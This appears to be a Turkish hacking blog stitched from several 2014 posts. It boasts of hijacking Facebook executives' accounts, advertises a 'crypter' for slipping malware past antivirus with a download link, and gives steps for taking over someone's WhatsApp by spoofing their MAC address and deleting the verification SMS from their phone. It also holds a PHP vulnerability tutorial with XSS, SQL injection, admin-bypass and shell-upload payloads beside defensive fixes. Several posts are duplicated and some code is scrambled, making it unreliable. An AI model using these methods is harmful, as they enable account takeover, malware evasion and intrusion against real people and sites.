bu etkinliği de öğrenince hemen bulduğum ilk açığı onlara ilettim. tam 4 gün sonra cevap geldi facebook’dan…
“bir kez daha kontrol eder misiniz? ekran görüntüsü gönderin” dediler. ben de cevap geldiğine sevindim ve hemen açığa baktım yeniden.
bir de ne göreyim..!! benim onlara ihbar ettiğim açığı düzeltmişler resmen!!!
“bunu siz mi yaptınız?” gibi mesajlar yazmadan, araştırmaya devam ettim…
ve ardından işte size bahsettiğim bu kadar açığı buldum…
kuzenim için bu yola başkoydum… ama facebook sağolsun… ne kadar ilginç bir şirketmiş…
resmen beni madur etti… bu kadar şeye rağmen resmen beni madur etti!!!
bu konuda bana yardımcı olursanız çok mutlu olacağım.
facebook’un aslında “GERÇEKTEN NE KADAR TEHLİKELİ” bir ortam olduğunu
ve istenildiği zaman kişilerin gizlilik ve güvenlik ilkelerini ihlal edip, özel hayatlarını hiç’e sayıp, gizlisini saklısını 3’üncü kişilere sunan bir kuruluş olan facebook’un,
bu durumunu ve insanların başlarına neler gelebileceklerini bilmelerini istiyorum.
bunlar da diğer detaylar ve gelişmeler:
—- “Sofistike Aşık” facebook’da kullandığım ismimdi. gerçek adımı kullanmıyordum. (youtubeda açıkların videosundaki görünen ismim de bu)
bu açıkları bulduğum ve onlara ihbar ettiğim süre içinde de hep bu ismi kullandım.
facebook’un bana yaptıklarından sonra açık ihbar etme sayfasının dahi açığını bularak, aynı mesajı yaklaşık 8000 kere gönderdim. onlar ise karşılık olarak sadece 60 adet gönderebilmişlerdi.
ve kesin olarak işte o an dediler, ne para ödülünü alabileceğimi ve ne de adımın yazılacağını. bu olaydan sonra da kullandığım “Sofistike Aşık” ismimi kara listeye aldılar.
bu ismi şu anda kimse facebook üzerinde tekrardan alamıyor. ben de dahil. tıpkı ünlülerin isimleri gibi. bu isimle yeni kayıt yapılamıyor…
—-Mark Zuckerberg (facebook’un yapımcısı) onun hesabını kullandığımı öğrenince, facebook’a giriş yaptığı 3 e-mail adresinden, benim kullanmış olduğumu kaldırdı.
Mark’a e-mail adresini kapattırttım. kendi hesabından arkadaşlarının yanı sıra, sevgilisine ve annesine dahi mesaj gönderdim.
—–Facebook’un diğer yapımcılarından olan Marcel Laverdet’ın da hesabını kullandım ve onlardan hakkımı talep ettiğim için beni beni herhangi bir kullanıcı gibi engelledi.
kendi açtığı grupları ve etkinlikleri bulup, oraya yorum bırakıyordum. en sonunda benimle baş edemedi ve çareyi beni engellemekte buldu.
—–normalde bu yaptıklarımdan dolayı beni çoktan facebook’dan engellemiş olmaları lazımdı, facebook hesabımı kapatmış olmaları gerekiyordu fakat ben her bulduğum açığı yayınladığım için benim hesabımı kapatamıyorlar. beni takip ediyorlar, ne yaptığımı inceliyorlar. bu yüzden hala facebook hesabım açık durumda, sadece “Sofistike Aşık” ismini kullanamıyorum…
en son gelişmeler bunlar ve ben hala sadece adımın orda yazılmasını istiyorum. tek istediğim bu, para dahi istemiyorum. sadece adımı whitehat sayfalarına yazsınlar yeter…
İşte Facebook'u İnleten Türk.
22 Nisan 2014 Salı
NETGATE Spy Emergency v13.0.405.0 Full
Program virüsler dışındaki bilgisayarınıza bulaşmış casus yazılım (spyware), kötü niyetli yazılım (malware), reklam amaçlı yazılım (adware) gibi zararlıları silmede ve bunlardan korunmada kullanabileceğiniz alternatif bir güvenlik programıdır. Daha çok spyware ve malware temizlemede kullanılsada yeni versiyonlarda adware temizleme eklenmiştir.
26 Nisan 2014 Cumartesi
İnterneti Yöneten Kuruluştan Heartbleed İtirafı
Akamai, Heartbleed açığını itiraf etti!
İnterneti yöneten bu dev firma, son yılların en büyük açığını kapayamadığını kendisi itiraf etti!
İnternet trafiğinin yaklaşık üçte birini yöneten Akamai, Pazar günü yaptığı açıklamada kendi geliştirdikleri, Heartbleed’den koruduğu düşünülen özel bir kodda Heartbleed açığının bulunduğunu itiraf etti.
Heartbleed yamasında hata olduğunu fark eden Akamai Technologies, bunun sonucunda tüm SSL sertifikalarını ve kullanıcı-web siteleri arasında şifreli bağlantı için kullanılan güvenlik anahtarlarını tekrar yayınlamaya başladı.
92 farklı ülkede 147 bin sunucusu bulunan Akamai’nin sunucularının Ağustos 2012′den 4 Nisan 2014′e kadar Heartbleed açığına karşı düzenlenebilecek saldırılara açık olduğu söyleniyor. Yani hacker’lar, bu süre içinde parolaları, oturum cookie’lerini ve fazlasını ele geçirmiş olabilirler. Akamai’nin OpenSSL içine yaklaşık 10 sene önce özel bir kod eklemesinin nedeni ise, SSL bağlantısı için oluşturulan gizli anahtarların oluşturulma yöntemini değiştirmekti.
Akamai CTO’su Andy Ellis, yeni SSL anahtarlarının ve sertifikalarının yayınlanmasının genellikle hızlı olacağını, ancak ek doğrulama gerektiren sertifika yetkililerinde işlemin daha uzun sürebileceğiniz söylüyor.
CHIP ONLİNE
İnterneti yöneten bu dev firma, son yılların en büyük açığını kapayamadığını kendisi itiraf etti!
İnternet trafiğinin yaklaşık üçte birini yöneten Akamai, Pazar günü yaptığı açıklamada kendi geliştirdikleri, Heartbleed’den koruduğu düşünülen özel bir kodda Heartbleed açığının bulunduğunu itiraf etti.
Heartbleed yamasında hata olduğunu fark eden Akamai Technologies, bunun sonucunda tüm SSL sertifikalarını ve kullanıcı-web siteleri arasında şifreli bağlantı için kullanılan güvenlik anahtarlarını tekrar yayınlamaya başladı.
92 farklı ülkede 147 bin sunucusu bulunan Akamai’nin sunucularının Ağustos 2012′den 4 Nisan 2014′e kadar Heartbleed açığına karşı düzenlenebilecek saldırılara açık olduğu söyleniyor. Yani hacker’lar, bu süre içinde parolaları, oturum cookie’lerini ve fazlasını ele geçirmiş olabilirler. Akamai’nin OpenSSL içine yaklaşık 10 sene önce özel bir kod eklemesinin nedeni ise, SSL bağlantısı için oluşturulan gizli anahtarların oluşturulma yöntemini değiştirmekti.
Akamai CTO’su Andy Ellis, yeni SSL anahtarlarının ve sertifikalarının yayınlanmasının genellikle hızlı olacağını, ancak ek doğrulama gerektiren sertifika yetkililerinde işlemin daha uzun sürebileceğiniz söylüyor.
CHIP ONLİNE
16 Haziran 2014 Pazartesi
Google'dan İstemediğiniz Bilgileri Silin!
Avrupa Birliği Adalet Divanı tarafından Google'a yapılan uyarı sonuç verdi: Artık Google arama sonuçlarına siz de müdahale edebileceksiniz. İşte önemli detaylar.
Her şey İspanyol Mario Costeja Gonzalez'in mahkemeye yaptığı başvuru ile başladı. Emlak satarken 16 yıl önce yaşadığı sıkıntıların halen Google'da yer aldığı gerekçesiyle, bu verilerin internetten (Google arama sonuçlarından) silinmesini talep eden Gonzalez, takip eden dava sonucunda Google'ın Avrupa'da "unutulma hakkı" önerisiyle karşılaşmasını sağladı.
Google'dan Larry Page ise Financial Times'a verdiği bir röportajda, Google'ın 30 Mayıs itibarıyla Avrupalı internet kullanıcılarına kendileriyle ilgili eski veya zarar verici nitelikteki bilgileri silmeleri için yeni bir yöntem sunacaklarını açıkladı. Nihayet o gün geldi ve Google'ın "arama sonuçlarından kaldırma formu" yayınlandı.
İnternette Unutulma Hakkı
Google'ın Yasal Yardım bölümünden ulaşabileceğiniz bu formda, Avrupa Veri Koruma yasaları kapsamında kendi isminizle ilgili olarak arama sonuçlarında görüntülenen ve rahatsız olduğunuz içeriklerin kaldırılmasını talep edebiliyorsunuz. Google tarafından yapılan açıklamaya göre, talepler değerlendirilirken halkın bu içeriğe ne kadar ilgi duyduğu ve verinin ne kadar eski olduğu da göz önünde bulundurulacak.
Google'ın yeni yayınladığı bu form, Nevizade akşamları sonrası çekilen ve iş başvurularında adınızı Google'da aratan patronların oldukça ilgisini çekebilecek o fotoğrafları kaldırmanız için bir hayli işe yarayacaktır. Sizin de kendinizle ilgili olarak kaldırmak istediğiniz içerikler var ise,buraya tıklayarak formu doldurabilirsiniz.
Son bir ekleme: İçerik kaldırma talepleriniz Google'ın Avrupa bölgesinde kullanılan versiyonlarında geçerli oluyor. ABD merkezli olarak kullanılan Google.com bu taleplerden etkilenmiyor.
3 Mayıs 2014 Cumartesi
MySql Baglayıcı
Bir PHP Tools'dur.
Tools'un amacı girdiğiniz bir sunucudaki config bilgilerini girip sunucular arası site geçişleri yapmanıza yarar
Buradan indirebilirsiniz
Tools'un amacı girdiğiniz bir sunucudaki config bilgilerini girip sunucular arası site geçişleri yapmanıza yarar
Buradan indirebilirsiniz
12 Nisan 2014 Cumartesi
Imma Be CRYPTER v1 [REUD 23.02.2014]- [4/34 01.03.2014]
Imma Be CRYPTER v1 [REUD 23.02.2014]- [4/34 01.03.2014]
+ Yazılım Adı : Imma Be CRYPTER
+ Yazılım Sürümü : v1.0
+ Yazılım Üreticisi (Coder) : localhost/eksikeksik
+ Tarama Sonuçları :
File Name: Stub.exe
File Size: 29.5 KB
Scan Date: 2014-02-22
Scan Result: 2/34
MD5: 247288f60abecfe1eb2d2126c2b0690d
Verified By NoDistribute: Virus Scan Result
AVG Free: Clean
ArcaVir: Clean
Avast: Clean
AntiVir (Avira):TR/Dropper.MSIL.Gen
BitDefender: Clean
VirusBuster Internet Security: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
G Data: Clean
IKARUS Security:Trojan.Msil
Kaspersky Antivirus: Clean
McAfee: Clean
MS Security Essentials: Clean
ESET NOD32: Clean
Norman: Clean
Norton Antivirus: Clean
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
Immunet Antivirus: Clean
K7 Ultimate: Clean
Panda CommandLine: Clean
VIPRE: Clean
+ Ekran Görüntüsü :


+ İndirme Linki :Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
+ Yazılım Sürümü : v1.0
+ Yazılım Üreticisi (Coder) : localhost/eksikeksik
+ Tarama Sonuçları :
File Name: Stub.exe
File Size: 29.5 KB
Scan Date: 2014-02-22
Scan Result: 2/34
MD5: 247288f60abecfe1eb2d2126c2b0690d
Verified By NoDistribute: Virus Scan Result
AVG Free: Clean
ArcaVir: Clean
Avast: Clean
AntiVir (Avira):TR/Dropper.MSIL.Gen
BitDefender: Clean
VirusBuster Internet Security: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
G Data: Clean
IKARUS Security:Trojan.Msil
Kaspersky Antivirus: Clean
McAfee: Clean
MS Security Essentials: Clean
ESET NOD32: Clean
Norman: Clean
Norton Antivirus: Clean
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
Immunet Antivirus: Clean
K7 Ultimate: Clean
Panda CommandLine: Clean
VIPRE: Clean
+ Ekran Görüntüsü :
+ İndirme Linki :Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
Kod:
MD5 : 4fa97cfa4be9539560780882e26cf78b
Kod:
MD5 Çözemeyenler için decrypt edilip DECRYPTER sitelerine yayılmıştır.
---> http://md5decryption.com/
Etiketler:
bilgisayar-güvenlik
,
bilim
,
güvenlik
,
haberler
,
hosting
,
internet
,
kriptografi
,
mail-güvenlik
,
php
,
portal
,
programlama
,
scripts
,
sourcecodes
,
undetect
,
vb.net
,
vb6
,
web-güvenlik
,
web-programlama
,
webmaster
25 Nisan 2014 Cuma
Whatsapp Mesajları Okuma
DENENMEMİŞTİR.
Gerekenler :Kişinin mac adresi (ayarlar/cihaz hakkında)
Rootlu bir android cihaz
Busybox
Terminal Uygulaması
önce android cihazımıza root atıyoruz sonra terminal kuruyoruz
Uçbirimi(terminal) açın ve şu kodları yazın
--------------------------
su
busybox iplink show eth0
--------------------------
Bu işlemle şuan sistemde kayıtlı mac adresinizi görebilirsiniz.
:busybox ifconfig eth0 hw ether 00:11:22:33:44:55
bu işlemle istediğiniz yeni mac adresini kayıt edebilirsiniz biz burada 00:11:22:33:44:55 kullandık
ethernet ve wlan olarak ne kullanıyorsunuz ona göre
busybox ifconfig wlan0 hw ether 06:27:19:F8:8F:8F
yeni mac adresi olarak kişinin adresini kayıt ediyoruz sonra whatsapp kuruyoruz ve sms gelıyo o numarayı elle giriyoruz ve işte artık o kişinin whatsapp ına sahipsiniz
android cihaz konusunda sıkıntı yaşıyorsanız pc nize sanal android kurun
not kişinin telinden çıkarken whatsapp onay kodu mesajını silmeyi unutmayın
19 Haziran 2014 Perşembe
Internet ve Ağ Güvenliği: Web Güvenliği
İnternet'te Güvenle Gezinebilir miyiz?
"Yıkılacakmış gibi duran bir binaya girer misiniz?"
"Gitmek istediğiniz yer değil de oraya ulaşmak için izleyeceğiniz yol tehlikeli olsa ne yaparsınız?"
Bir başka deyişle
"Tehlikeli internet sitelerini ziyaret eder misiniz?"
"Hangi iletişim yolları tehlikeli olabilir?"
İnternette hemen her alanda bilgi paylaşımı, alışveriş, bankacılık işlemleri, vergi ödemesi gibi işlemler yapabiliyoruz. Bilgilerimizin ele geçirilmesi için bilgisayarımıza erişilmesi şart değil. İnternet siteleri üzerinden gerçekleştirdiğimiz işlemler sırasında kullandığımız bilgilere ulaşmak da saldırganlar için yeterli olabilir.
Sanal dünyanın korsanları bilgisayarımıza ulaşmak yerine,
Peki bu protokoller ile sağlanan veri alışverişi ne kadar güvenlidir?
Bilgisayarınız ile diğer bilgisayarlar veya sunucular arasında bilgi paylaşımı ile haberleşmeyi sağlayan bu iletişim yolları, kullanılan protokole göre güvenli ya da güvensiz olabilir.
Güvenli olmayan iletişim yolları - Hangileridir?
İnternette genelde kullanılan ve bilgi alışverişini sağlayan erişim protokolleri şunlardır;
İletişim yolunun güvenliği - Nasıl sağlanır?
İnternet üzerinden hizmet verirken en azından bilgi girişi yapılması istenen kullanıcı adı, şifre gibi hassas ve kişisel bilgileri korumak gerekir.
Başkalarının görmesini/dinlemesini engellemek amacı ile SSL yani güvenli iletişim yollarını kullanılır.
Bu protokol ile transfer edilen bilgiler şifrelenerek gönderilir ve sitenin bir güvenlik sertifikası bulunur.
Güvenli iletişim yolu kullanımı - Nasıl anlaşılır?
Örnekler : 1: Firefox - 2: Internet Explorer
Normal bir siteye girdiğimizde adres çubuğunda gördüğümüz HTTP başlığı interaktif bankacılık gibi kritik işlem yapılan bir siteye girdiğimizde yerini HTTPS olarak değiştirir. Buradaki “S” güvenli (secure) anlamına gelmektedir.
Tarayıcınızın altında bulunan çubukta da kilit ikonu çıkacaktır.
Bunların yanı sıra şifreli iletişimlerde (SSL- Secure Socket Layer) sitenin sahip olduğu sertifika ve sertifikanın geçerliliği kontrol edilmelidir.
"Yıkılacakmış gibi duran bir binaya girer misiniz?"
"Gitmek istediğiniz yer değil de oraya ulaşmak için izleyeceğiniz yol tehlikeli olsa ne yaparsınız?"
Bir başka deyişle
"Tehlikeli internet sitelerini ziyaret eder misiniz?"
"Hangi iletişim yolları tehlikeli olabilir?"
İnternette hemen her alanda bilgi paylaşımı, alışveriş, bankacılık işlemleri, vergi ödemesi gibi işlemler yapabiliyoruz. Bilgilerimizin ele geçirilmesi için bilgisayarımıza erişilmesi şart değil. İnternet siteleri üzerinden gerçekleştirdiğimiz işlemler sırasında kullandığımız bilgilere ulaşmak da saldırganlar için yeterli olabilir.
Sanal dünyanın korsanları bilgisayarımıza ulaşmak yerine,
- cazip tekliflerde bulunarak bizleri kendi mekanlarına ve bir tuzağın içine çekebilirler,
- bizlerin güvenle işlem yaptığımız mekana özgü zayıflıklardan yararlanabilirler.
Peki bu protokoller ile sağlanan veri alışverişi ne kadar güvenlidir?
Bilgisayarınız ile diğer bilgisayarlar veya sunucular arasında bilgi paylaşımı ile haberleşmeyi sağlayan bu iletişim yolları, kullanılan protokole göre güvenli ya da güvensiz olabilir.
Güvenli olmayan iletişim yolları - Hangileridir?
İnternette genelde kullanılan ve bilgi alışverişini sağlayan erişim protokolleri şunlardır;
- HTTP (Hyper Text Transfer Protocol) Hiper metin transfer protokolü ve
- FTP (File Transfer Protocol) Dosya Transfer Protokolü.
İletişim yolunun güvenliği - Nasıl sağlanır?
Başkalarının görmesini/dinlemesini engellemek amacı ile SSL yani güvenli iletişim yollarını kullanılır.
Bu protokol ile transfer edilen bilgiler şifrelenerek gönderilir ve sitenin bir güvenlik sertifikası bulunur.
Güvenli iletişim yolu kullanımı - Nasıl anlaşılır?
Örnekler : 1: Firefox - 2: Internet Explorer
Tarayıcınızın altında bulunan çubukta da kilit ikonu çıkacaktır.
Bunların yanı sıra şifreli iletişimlerde (SSL- Secure Socket Layer) sitenin sahip olduğu sertifika ve sertifikanın geçerliliği kontrol edilmelidir.
22 Nisan 2014 Salı
( Find Bug On PHP System)
Find Bug 0n PHP Systems
Homepage: http://www.Turkhackteam.net
Date: 18.04.2014
//*
PHP sistemlerde ki zafiyetleri fonksiyonlar ve değişkenler üzerinden ele alacağız.
Bunu sınıflandırmamızın sebebi çoğu arkadaşımızın Php sistemlerde açık bulmakta ve tanımlamakta zorluk çekmesidir.
Bu dökümanın size bug bulma ve tanımlamada yardımcı olacaktır.
*//
Php sistemlerde ilk olarak kaynak kodlarında aşağıdaki değişkenlere göz atmalısınız:
Neden? Cevap:
Php sistemlerde var olan bu değişkenler Input table değişkenleridir.
Örneğin admin giriş sayfasında şifremizi girdiğimiz form alanı $_POST değişkeni ile değere atanıyorsa yapacağımız iş bu değişken alanını incelemek olmalıdır.
Çünkü kontrolsuz inputlar sistemde zaafiyet oluşturur.
Şimdi hepsini teker teker inceleyeceğiz.
__________________________________________________ _____________
XSS kullanıcı odaklı bir açıktır.
Browserler üzerinde; Web sayfalarına inject edilen javascript kodları ile kullanıcıya yönelik saldırı yapılır.
Günümüzde Website sahiplerinin bu açık hakkında bilgisizliği ve tüm tarayıcıların javascript desteği olması XSS açıklarının çok yaygın olduğunu anlamak için yeterlidir.
Temel olarak HTML etiketlerinin(tag) kötüye kullanımına sonucu meydana gelir.
ÖRNEK:
Değişkenler hiç bir filtreye tabi değil.
Örnek atak modülü:
DEFANS
HTML etiketlerinin kötüye kullanımını engellemek gerekir.
Bunun için "htmlspecialchars" fonksiyonunu kullanmalıyız:
__________________________________________________ _____________
[~] SQL Injection Vulnerability
SQL Injection XSS açıklarının aksine server odaklı bir açıktır.
SQL Injection açıkları user inputlarının(kullanıcı girdilerinin) filtrelenmesinden meydana gelir.
Soracaksınız XSS de filtre eksikliğinden meydana gelmekte farkı ne? Cevap:
SQL Injection: Database ile data alış verişi yaptığımız alanların filtrelenmemesinden kaynaklanır.
XSS: WEB APPLICATION > USER > BROWSER > USER
SQL: WEB APPLICATION > USER > DATABASE > USER
şeklinde meydana gelir.
ÖRNEK:
id değikeni hiç bir filtremeye tabi değil.Bir üstten tırnak koysak database hata verecektir!
Örnek atak modülü:
DEFANS
Burada SQL Injectionda kullanılan "+(artı)" ";(noktalı virgül)" terimleri yasaklayacağız.
Yukarda array kullanarak yasak terimleri dizi içine aldık ve id değerini bu terimlere göre yeniden tanımladık.
__________________________________________________ _____________
Php fonksiyonlarının yanlış kullanılması ile meydana gelen bir açık türüdür.
ÖRNEK
Yukardaki fonksiyonun çağırılma şekline dikkat ediniz.
Örnek atak Modülümüz:
Ve sayfamıza "phpinfo" bilgilerinin geldiğini göreceksiniz.
DEFANS
Bu açıklar PHP Bugları hakkında bilgisi olmayan acemi coderlerden kaynaklanır.
Asla bu şekilde fonksiyon çağırmayanız.
Büyük problemlerle karşı karşıya kalabilirsiniz.O yüzden fonksiyonları çağırırken:
Şeklinde kullanılabilir.
__________________________________________________ _____________
Register global çok tehlikeli ve bazen yararlı bir PHP ekidir.
Peki ne işe yarar?
Bildiğiniz gibi $_POST ve $_GET terimlerini php uygulamalarmızda değişkenleri alırken kullanıyoruz.
Register global açık olduğunda bir yarar sağlıyor ve $_GET ya da $_POST kullanmanıza gerek kalmadan direkt olarak input ismini değişken olarak atıyor.Ve az kod yazmanızı sağlıyor.
Ancak bunu php uygulamanıza çok güvendiğiniz zaman kullanınız.Neden?
Çünkü direkt değişkene atanan inputu istediğiniz gibi şekillendirebiliriz.Register Globals PHP 4.1 sürümünden sonra off olarak kapalı şekilde gelmiştir.
ÖRNEK1:
Yukardaki örnekte "isset" fonksiyonu değişkenin var olup olmadığını kontrol eden bir fonksiyondur.
Nasıl atak yaparız?Değişken direkt olarak inputa atandığı için değerini biz belirleyebiliriz.
Örnek atak modülü:
Ve admin paneli açılacaktır.Peki bu açığı nasıl kapatacağız?
DEFANS
#Register Globals fonksiyonunu daima kapalı tutunuz.
#Ve yahut kendi insiyatifinizi kullanarak:
bu değişkeni ekleyiniz:
ÖRNEK
Register Global 0n olduğu zaman inputu şekillendirebildiğimize göre çok fazla sayıda açık türü meydana gelebilir.
Yukarda include ile geçerli inputu şekillendirelim.
Örnek atak modülü:
__________________________________________________ _____________
Shell upload açıkları php sistemlerde dosya tiplerinin tam filtre edilememesinden kaynaklanır.
Sadece grafik uzantılı dosyaları upload eden bir uygulamaya kendi php kodlarımızı upload edebiliriz.
ÖRNEK
Yukardaki !="image/gif" ifadesi dosya türünün sadece gif olduğunu söylüyor.
Ancak dosya uzantısı kontrol edilmiyor.Dosya türü ile uzantısı çok farklı terimlerdir.
Peki nasıl exploit ederiz?Cevap : php dosyamızı gif türünde yollarız:
Php dosyamızın ilk satırına:
"GIF89A" kodunu hepsi büyük harf olarak girmemiz gerekiyor.Küçük harflerle kabul olmaz.
Ve php dosyasının upload edildiğini göreceksiniz.
DEFANS
Dosya uzantılarını yasaklayarak filtre engeli koyabiliriz.
gibi uzantıları engelleyebiliriz.Aynı zamanda /upload klasörüne forbidden engeli koyabiliriz:
(.htaccess dosyası kullanarak ignore* yada deny all# komutları ile bunu yapabilirsiniz.)
En önemliside upload dosyalarına random isim verilmesini sağlayabiliriz.
Böylece php dosyaları upload edilse bile klasör yasak olduğundan ve ismide random olduğundan dosyayı görünteleyemeyecektir.
__________________________________________________ _____________
Xpath injection SQL Injectiona bir hayli benzeyen bir başka injection çeşididir.
SQL Injectionda SQL databaseye yapılan injection XPath Injectionda XML dosyasına yöneliktir.
Açığı tespit için ilk olarak XPath sorguları gönderen input alanları belirlemek gerekir.
ÖRNEK
Yukarıda 4. satırda kasva.xml dosyasına XPath query gönderdiğimize dikkat ediniz.
Şimdi bu xml dosyasına bakalım:
XML Dosyasındaki taglere dikkat ediniz.
Evet php dosyamıza göre sorguları gönderelim:
Evet Xml dosyasındaki tüm objectler karşımızda.
__________________________________________________ _____________
Bu tür bir açık hidden form alanlarını kullanıcı data geçişi için kullanan her web sayfasında meydana gelebilir.
Hidden form alanlarını manipule ederek c0de inject edebiliriz.Peki nasıl olur bu iş?
Bir çok web programcısı bu alanları kodlarken hidden formlarda bulunan inputları code injectionu engellemek için
"> < " ’" gibi karakterlerden filtrelerler.
Anak bu filtreme datanın hidden forma geçişinden önce olmalıdır.Yani:
DATA - HIDDEN FORM - FILTRE >Bu kullanım güvenlik zaafiyeti yaratır.
DATA - FILTRE - HIDDEN FORM >Güvenli kullanım.
Peki bu açıklar ne tür sayfalarda bulunur; örneğin multi geçişli admin sayflarında admin ismi hidden formlara geçiş yapar.
user-login-HIDDEN FORM-admin-login-HIDDEN FORM-yönetici
ÖRNEK
Örnek bir kullanıma bakalım:
Yukardaki formda username yerine " > kasva kodunu girersek ne olur?Bakalım:
Evet görüldüğü gibi boş bir value değerine sahibiz artık.Yukarda girdiğimiz kod (" > kasva) sonuna kapatıcı tag(>) koymamamıza ağmen tamamlandığına dikkat ediniz.
Ve şimdi xss codumuzu inject edelim:
"> <scr ipt>alert(docu ment.cookie)</script> <a href =" (sonuna kapatıcı tag koymuyoruz)
Bakalım:
Ve cookie browsere vuracaktır
DEFANS
Hidden formlara filtresiz data geçişi yapmayınız!
__________________________________________________ _____________
Fazla görülmesede can sıkıcı bir açıktır.
Acemi Web programcıları backup dosyalarını saklarken random olarak adlandırırlar.
ÖRNEK
Yukarıdaki kodun 2. satırında rand() fonksiyonu 1-100 arası random sayı veriyor
ve 3. satırdada $rnd_backup_.sql ile bu backup dosyalarına atanıyor.
Bruteforce programı ile backup dosya ismini kolayca ele geçebiliriz
Fazla önemsenmeyen bir açık olmasına rağmen, önemli scriptlerde kendine yer buluyor:
Bakınız=> PHP-Fusion 6.00.105 Accessible Database Backups Download Vulnerable
Homepage: http://www.Turkhackteam.net
Date: 18.04.2014
//*
PHP sistemlerde ki zafiyetleri fonksiyonlar ve değişkenler üzerinden ele alacağız.
Bunu sınıflandırmamızın sebebi çoğu arkadaşımızın Php sistemlerde açık bulmakta ve tanımlamakta zorluk çekmesidir.
Bu dökümanın size bug bulma ve tanımlamada yardımcı olacaktır.
*//
Php sistemlerde ilk olarak kaynak kodlarında aşağıdaki değişkenlere göz atmalısınız:
Kod:
$_SERVER$_GET$_COO$_POSTKIEUEST $_FI$_REQLES$_ENVIE_VARS $_HTTP_ENV$_HTTP_COOK_VARS$_HTTP_GET_VARSP_POST_VARS $_HTT$_HTTP_POST_FILES$_HTTP_SERVER_VARS
Php sistemlerde var olan bu değişkenler Input table değişkenleridir.
Örneğin admin giriş sayfasında şifremizi girdiğimiz form alanı $_POST değişkeni ile değere atanıyorsa yapacağımız iş bu değişken alanını incelemek olmalıdır.
Çünkü kontrolsuz inputlar sistemde zaafiyet oluşturur.
Şimdi hepsini teker teker inceleyeceğiz.
__________________________________________________ _____________
[~] Cross Site Scripting Vulnerability (XSS)
XSS kullanıcı odaklı bir açıktır.
Browserler üzerinde; Web sayfalarına inject edilen javascript kodları ile kullanıcıya yönelik saldırı yapılır.
Günümüzde Website sahiplerinin bu açık hakkında bilgisizliği ve tüm tarayıcıların javascript desteği olması XSS açıklarının çok yaygın olduğunu anlamak için yeterlidir.
Peki nasıl meydana gelir?
Temel olarak HTML etiketlerinin(tag) kötüye kullanımına sonucu meydana gelir.
ÖRNEK:
Kod:
<?php$xss = $_GET[’alco’];print $xss ;?>
Örnek atak modülü:
Kod:
#http://127.0.0.1:80/index.php?alco="><scr ipt>alert(********.cookie);</script>
HTML etiketlerinin kötüye kullanımını engellemek gerekir.
Bunun için "htmlspecialchars" fonksiyonunu kullanmalıyız:
Kod:
<?php$xss = $_GET[’alco’];print htmlspecialchars($xss) ;?>
[~] SQL Injection Vulnerability
SQL Injection XSS açıklarının aksine server odaklı bir açıktır.
SQL Injection açıkları user inputlarının(kullanıcı girdilerinin) filtrelenmesinden meydana gelir.
Soracaksınız XSS de filtre eksikliğinden meydana gelmekte farkı ne? Cevap:
SQL Injection: Database ile data alış verişi yaptığımız alanların filtrelenmemesinden kaynaklanır.
XSS: WEB APPLICATION > USER > BROWSER > USER
SQL: WEB APPLICATION > USER > DATABASE > USER
şeklinde meydana gelir.
ÖRNEK:
Kod:
<?php$id= $_GET[’id’];....y= "SELECT * FROM users WHERE id= ’ “ .$id." ;" ...$quer?>
Örnek atak modülü:
Kod:
#http://127.0.0.1:80/index.php?id=1+UNION+SELECT+1,@@version,3,4,5+from+users/*
Burada SQL Injectionda kullanılan "+(artı)" ";(noktalı virgül)" terimleri yasaklayacağız.
Kod:
<?php$id= $_GET[’id’];....k = array("\\\\\\\\"", "\\\\\\\\\\\\\\\\", "/", "*", "’", "=", "- ", "$yasa#", ";", "<", ">", "+", "%");id = str_replace($yasak, "", $id);$$query= "SELECT * FROM users WHERE id= ’ “ .$id." ;" ...?>
Yukarda array kullanarak yasak terimleri dizi içine aldık ve id değerini bu terimlere göre yeniden tanımladık.
__________________________________________________ _____________
[~] Dynamic Evaluation Vulnerability
Php fonksiyonlarının yanlış kullanılması ile meydana gelen bir açık türüdür.
ÖRNEK
Kod:
<?php$fonksiyon = $_GET[’fonksiyon’];$fonksiyon();?>
Örnek atak Modülümüz:
Kod:
#http://127.0.0.1:80/index.php?fonksiyon=phpinfo
DEFANS
Bu açıklar PHP Bugları hakkında bilgisi olmayan acemi coderlerden kaynaklanır.
Asla bu şekilde fonksiyon çağırmayanız.
Büyük problemlerle karşı karşıya kalabilirsiniz.O yüzden fonksiyonları çağırırken:
Kod:
<?phpunction fonksiyon()f{nksiyon = $_GET(’fonksiyon’) pr$foint $fonksiyon ;}?>
__________________________________________________ _____________
[~] Register Globals Vulnerability
Register global çok tehlikeli ve bazen yararlı bir PHP ekidir.
Peki ne işe yarar?
Bildiğiniz gibi $_POST ve $_GET terimlerini php uygulamalarmızda değişkenleri alırken kullanıyoruz.
Register global açık olduğunda bir yarar sağlıyor ve $_GET ya da $_POST kullanmanıza gerek kalmadan direkt olarak input ismini değişken olarak atıyor.Ve az kod yazmanızı sağlıyor.
Ancak bunu php uygulamanıza çok güvendiğiniz zaman kullanınız.Neden?
Çünkü direkt değişkene atanan inputu istediğiniz gibi şekillendirebiliriz.Register Globals PHP 4.1 sürümünden sonra off olarak kapalı şekilde gelmiştir.
ÖRNEK1:
Kod:
<?phpif (isset($admin)) {//Admin Paneline Hoş Geldiniz![...]} else {yaptınız! [...] } ?>//Yanlış giriş
Nasıl atak yaparız?Değişken direkt olarak inputa atandığı için değerini biz belirleyebiliriz.
Örnek atak modülü:
Kod:
#http://127.0.0.1:80/admin.php?admin=1
DEFANS
#Register Globals fonksiyonunu daima kapalı tutunuz.
#Ve yahut kendi insiyatifinizi kullanarak:
Kod:
$is_admin =();
Kod:
